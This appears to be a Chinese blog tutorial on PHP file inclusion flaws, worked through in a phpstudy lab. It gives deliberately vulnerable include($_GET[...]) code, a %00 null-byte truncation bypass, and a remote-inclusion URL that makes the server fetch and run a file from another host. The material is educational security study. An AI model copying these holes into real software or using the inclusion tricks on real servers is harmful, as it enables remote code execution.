文件包含漏洞的小点总结

文件本地与远程包含:

文件包含有本地包含与远程包含的区别:本地包含只能包含服务器已经有的问题;

远程包含可以包含一切网络上的文件。

  • 本地包含:

①无限制

感受一下使用phpstudy的文件上传,开启phpstudy的apache服务,在网站根目录新建两个文件

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?> 

//upload.php 
<?php 
$filename=$_GET['filename']; 
include($filename); 
?>

直接访问localhost/upload.php?filename=1.txt(upload.php文件内容意为使用GET方式将文件名参数传入,执行包含指令),访问如图(即使是txt文件,但是include会将其按php文件进行解析)

②有限制

如果服务器对上传的文件有限制,我们需要做绕过处理将文件包含进去。

在网站根目录下新建两个文件

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?>
 
//upload2.php 
<?php 
$filename=$_GET['filename']; 
include($filename.'.html') 
?>

如果直接访问localhost/upload2.php?filename=1.txt会报错,因为有限制,我们可以使用%00截断进行绕过。(%00具体解释参考往篇)访问localhost/upload2.php?filename=1.txt%00

长度截断:Windows和Linux对命名长度有限制,前者256个字符(磁盘分区还占一个,用户只能使用255个),后者4096

  • 远程包含:

phpstudy其他选项菜单-php扩展与设置-参数开关设置中打开allow_url_include(一般情况下为了安全性,这个是关的状态)

在远程服务器上上传文件(或者可以用虚拟机靶机做实验,在靶机的phpstudy上的根目录里写文件)如下:

php 复制代码
//1.txt 
<?php 
phpinfo(); 
?>

靶机查询IP地址,假如是192.168.123.23

就可以在主机上直接访问http://192.168.123.23:88/1.txt

可以看到上传文件内容。

我们再使用文件包含,即访问http://localhost/upload.php?filename=http://192.168.123.23:88/1.txt即可执行文件内容。![](https://i-blog.csdnimg.cn/direct/d7cd994ef2b347fc837591c509619374.png)

相关推荐
聚铭网络9 分钟前
聚铭安全管家平台2.0实战解码 | 安服篇(三):配置保障 自动核查
安全
java叶新东老师10 分钟前
Linux /proc/目录详解
linux·运维·服务器
都给我32 分钟前
服务器中涉及节流(Throttle)的硬件组件及其应用注意事项
服务器·网络·express
ALe要立志成为web糕手36 分钟前
计算机网络基础
网络·安全·web安全·网络安全
吹个口哨写代码1 小时前
防止包含 XSS 攻击风险的内容提交成功
java·服务器·前端
iFulling2 小时前
【PHP】Swoole:CentOS安装Composer+Hyperf
centos·php·swoole
默|笙2 小时前
【Linux】基本指令(2)
linux·运维·服务器
ZY小袁2 小时前
MGRE综合实验
服务器·网络·笔记·网络安全·学习方法·信息与通信·p2p
beyoundout8 小时前
HAproxy
linux·运维·服务器
盖雅工场8 小时前
零工合规挑战:盖雅以智能安全体系重构企业用工风控
网络·安全·重构